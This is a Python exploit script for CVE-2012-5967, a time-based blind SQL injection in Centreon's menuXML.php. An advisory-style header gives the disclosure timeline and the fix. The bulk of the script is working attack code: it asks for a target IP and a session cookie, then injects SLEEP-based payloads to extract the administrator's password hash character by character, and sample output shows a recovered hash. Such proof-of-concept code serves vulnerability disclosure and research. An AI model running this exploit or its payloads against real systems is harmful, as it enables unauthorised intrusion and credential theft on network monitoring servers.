#!/usr/bin/env python # Exploit Title: Centreon 2.3.3 - 2.3.9-4 menuXML.php Blind SQL Injection Exploit # Disclosure Date: December 12, 2012 # Author: modpr0be (@modpr0be) # Platform: Linux # Tested on: Centreon Enterprise Server with Centreon 2.3.9-4 on CentOS 5.5 x86_64 (Final) # Software Link: http://www.centreon.com/Content-Download/download-centreon-enterprise-server # References: http://www.spentera.com/2012/12/centreon-enterprise-server-blind-sql-injection/ # CVE-ID: CVE-2012-5967 ### DISCLAIMER # Script provided 'as is', without any warranty. # For educational purposes only. # Do not use this code to do anything illegal. ### Software Description # The Centreon Software Suite is a set of modular software programs designed for managing # and controlling your information systems. It lets you supervise and measure performance and # quality of service so that you can optimise the use of your resources. ### Vulnerability Details # Vulnerability found in menuXML.php inside the 'menu' parameter. By injecting payload after the # menu parameter, e.g: ' AND SLEEP(5) AND 'meHL'='meHL, the web application hung for 5 seconds, # which gives us a conclusion that the web application is vulnerable to time-based sql injection. ## Further notes: # User with low privilege access (e.g: guest user) can still exploit this vulnerability # The script below is for PoC of the vulnerability only. # -=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=- # [ by modpr0be - research[at]spentera.com ] # # (!) We need the target IP: # (!) Put the value of a valid PHPSESSID session: 3uh52mtl1hlmsha4nmkftde5l3 # (-) Using Time-Based method with 1s delay. This will take some time, go grab a coffee.. # (!) Getting admin password hash: 2995cb0650c5f107230ed569a8c4d6e5 # (-) Done! Admin password hash extracted in 676 seconds ### Solution # Update to Centreon 2.4.0 or newer. ### Disclosure timeline # 10/26/2012 - Bug found and reported to CERT/CC # 12/07/2012 - Update from CERT/CC to publish on 12/12/2012 # 12/12/2012 - Security advisory released via CERT/CC import sys,time,urllib,urllib2 print """ -=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=- [ by modpr0be - research[at]spentera.com ] """ host = raw_input("(!) We need the target IP: ") target = 'http://%s/centreon/menu/xml/menuXML.php' %(host) # sid is the same as PHPSESSID session value, so put the value of PHPSESSID here sid = raw_input("(!) Put the value of a valid PHPSESSID session: ") cookie = 'PHPSESSID=%s' %(sid) # SQLi delay, tested on LAN environment. # Consider if it's a remote target, you may increase the delay value (default: 1 seconds) delay=1 print "(-) Using Time-Based method with %ds delay. This will take some time, go grab a coffee..\n"%int(delay) def Hex2Des(item): return ord(hex(item).replace('0x','')) def adminhash(m,n): #borrow from SQLmap :) adminquery=("' AND 9999=IF((ORD(MID((SELECT IFNULL(CAST(contact_passwd AS CHAR),0x20) FROM contact" " WHERE contact_id=1 LIMIT 0,1),%s,1)) > %s),SLEEP(%s),9999) AND 'mEhL'='mEhL" %(m,n,delay)) value = { 'menu': '2'+adminquery, 'sid': '%s'%(sid) } url = "%s?%s" %(target,urllib.urlencode(value)) req = urllib2.Request(url) req.add_header('Cookie', cookie) try: starttime=time.time() response = urllib2.urlopen(req) endtime = time.time() return int(endtime-starttime) except: print '\n(-) Uh oh! Exploit fail..' sys.exit(0) sys.stdout.write('(!) Getting admin password hash: ') sys.stdout.flush() starttime = time.time() for m in range(1,33): for n in range(0,16): wkttunggu = adminhash(m,Hex2Des(n)) if (wkttunggu < delay): sys.stdout.write(chr(Hex2Des(n))) sys.stdout.flush() break endtime = time.time() print "\n(-) Done! Admin password hash extracted in %d seconds" %int(endtime-starttime)